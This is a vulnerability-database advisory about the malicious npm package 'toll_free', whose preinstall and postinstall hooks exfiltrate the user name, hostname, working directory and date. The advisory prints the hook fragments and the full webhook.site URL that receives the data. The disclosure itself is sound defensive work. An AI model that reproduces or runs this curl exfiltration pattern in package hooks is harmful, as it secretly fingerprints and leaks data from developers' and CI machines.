VDB

GCVE-110-OSM-2026-9203

GCVE-110-OSM-2026-9203
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published July 29, 2026
This package implements a classic install-time exfiltration attack. Both preinstall and postinstall hooks execute `curl -s` against a webhook.site endpoint, transmitting `$(whoami)`, `$(hostname)`, `$PWD`, and `$(date)` — standard system reconnaissance exfiltrated on package install. The webhook URL `https://webhook.site/d80b4602-8a87-4693-8510-6ff77c62788e/blots` is recovered in plaintext with no obfuscation, and the attacker model is unambiguous: fingerprint the developer/CI machine the moment the package is installed. The publisher account 'isirli' is less than a day old, has only two packages (toll_free and voicemail — both suspicious names in this context), and the package has zero legitimate metadata. There is no plausible legitimate explanation for a no-description, no-repository package that fires curl-based environment exfiltration on install. ENTRY - Preinstall Script in package.json: ""preinstall": "curl -s \"" - Postinstall Script in package.json: ""postinstall": "curl -s \"" DESTINATION - webhookServices: https://webhook.site/d80b4602-8a87-4693-8510-6ff77c62788e/blots?u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date (exfil, plaintext) EXFIL - OAST/Interactsh Exfiltration in package.json: "webhook.site" ADDITIONAL FINDINGS - Brand New Package - Very New NPM Publisher Account

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknowntoll_freeall (affected)

References

advisory
vendor

Browse GCVE Records

75,823 records in the GCVE database · Updated August 3, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›